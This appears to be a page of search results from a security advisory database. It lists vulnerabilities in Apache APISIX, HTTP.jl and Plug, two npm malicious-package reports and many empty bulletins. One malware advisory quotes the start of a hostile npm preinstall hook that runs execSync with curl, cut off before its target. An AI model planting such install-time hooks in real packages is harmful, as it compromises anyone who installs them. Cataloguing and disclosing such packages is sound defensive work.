888299 matches found
BIT-APISIX-2026-49872 Apache APISIX: Improper authentication in cas-auth plugin
Improper Authentication vulnerability in Apache APISIX. When the cas-auth plugin is used in a route, an attacker can possibly authenticate itself with credentials from a different source. This issue affects Apache APISIX: from 3.0.0 through 3.16.0. Users are recommended to upgrade to version...
BIT-APISIX-2026-49230 Apache APISIX: Authentication bypass in jwe-decrypt
Improper Validation of Integrity Check Value vulnerability in Apache APISIX. The jwe-decrypt plugin under default configuration is vulnerable to authentication bypass. This issue affects Apache APISIX: from 3.8.0 through 3.16.0. Users are recommended to upgrade to version 3.17.0, which fixes the...
MAL-2026-6298 Malicious code in ttal2ttml (npm)
Source: amazon-inspector 29387ac35a2248ad2e4b287b8c082f8d1a8d03b4937fc84a5b81fb85697e19d4 package.json declares a preinstall lifecycle script that runs node -e "try{require('child_process').execSync('curl -sf...
MINI-49GX-CFWJ-7FJP
Bulletin has no description...
MINI-MH65-R63G-HC9V
Bulletin has no description...
MINI-9VG2-RH96-QJH2
Bulletin has no description...
MINI-2W6J-22VH-HJ7J
Bulletin has no description...
MINI-G47X-FGC7-5MJ7
Bulletin has no description...
MINI-63MW-777F-62VJ
Bulletin has no description...
MINI-59WF-45GF-VJP8
Bulletin has no description...
MINI-P9PW-339C-8QV6
Bulletin has no description...
MINI-J662-PVCJ-GXPM
Bulletin has no description...
MINI-M74X-VFW5-FFM8
Bulletin has no description...
MINI-5W8G-63HF-R5C9
Bulletin has no description...
MINI-HV64-9M6J-WQWX
Bulletin has no description...
MINI-69V5-48QM-5XX2
Bulletin has no description...
MINI-GM8J-2XQR-XMM2
Bulletin has no description...
MINI-4MQ3-Q5FF-MCX7
Bulletin has no description...
MINI-44G8-3XVH-VFPC
Bulletin has no description...
MINI-VGF4-33RM-44JH
Bulletin has no description...
MINI-HQ35-4MFV-P62V
Bulletin has no description...
MINI-XH28-G2MV-7Q7V
Bulletin has no description...
MINI-5V2M-CX2C-5XR5
Bulletin has no description...
MINI-8HMV-2V5C-V2H6
Bulletin has no description...
MINI-H4F7-CH6P-C5PJ
Bulletin has no description...
MINI-H7CC-XHR9-3WXF
Bulletin has no description...
JLSEC-2026-620 WebSocket reader data race in auto-PONG/CLOSE-echo handling in HTTP.jl
Description: The WebSocket reader task processed incoming frames by calling wsonincomingdata! without holding ws.sendlock. That function is not a pure parser: its auto-PONG and CLOSE-echo paths push! onto the shared ws.codec.outgoingframes vector, while application send/ping/pong/close paths mutat...
JLSEC-2026-617 Open redirect in the HTTP.jl static file server canonical redirects
Description: The static file server's canonical 301 redirects (index-file strip, directory trailing-slash add, and file trailing-slash strip) built the Location header verbatim from the un-normalized request target. Request-target validation only requires a leading /, has no CTL bytes, and the...
JLSEC-2026-619 CR/LF injection in server-sent events (SSE) fields in HTTP.jl
Description: The server-side SSE serializer wrote the single-line fields event, id, and retry verbatim to the text/event-stream wire with no CR/LF filtering, and split the multi-line data field only on \n, ignoring a bare \r that is also a valid SSE line terminator. The SSEEvent constructor...
MINI-JX9Q-WH2Q-M7Q9
Bulletin has no description...
MINI-RW29-GH9G-X6VM
Bulletin has no description...
MINI-5H66-332R-9HWF
Bulletin has no description...
MINI-H2P2-FWGF-5MM9
Bulletin has no description...
MINI-F4PP-3XHX-HFHJ
Bulletin has no description...
MINI-P5VV-M9C5-FHFJ
Bulletin has no description...
MINI-HHJV-4R3R-RF6F
Bulletin has no description...
MINI-XXMR-W2V5-PJQ8
Bulletin has no description...
MINI-84RC-J298-64Q3
Bulletin has no description...
MINI-FR34-2WR8-JPFH
Bulletin has no description...
EEF-CVE-2026-54892 Plug: quadratic-time decoding of nested query/body parameters enables denial of service
Summary: Inefficient algorithmic complexity in Plug's nested-parameter decoder allows an unauthenticated remote attacker to cause denial of service. Plug.Conn.Query.decode/4 and Plug.Conn.Query.decode_each/2 parse query strings and application/x-www-form-urlencoded request bodies. When a key...
MINI-FM69-5JQ5-PCPR
Bulletin has no description...
MINI-6863-RWQ8-RM3Q
Bulletin has no description...
MINI-PMXX-9G6M-87MG
Bulletin has no description...
MAL-2026-6286 Malicious code in new-solt-1 (npm)
Source: ghsa-malware 548ecaba7e63993f2d3c88cfb13098ae8b6c69161e2e748bd8b931dcbaec8c7b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
MINI-93HG-57WX-WW2X
Bulletin has no description...
MINI-3MJF-QVW3-367F
Bulletin has no description...
MINI-X3WP-747M-7PRV
Bulletin has no description...
MINI-P4PW-7P5M-V59H
Bulletin has no description...
MINI-CMPM-M559-JM96
Bulletin has no description...
MINI-39JW-R725-5694
Bulletin has no description...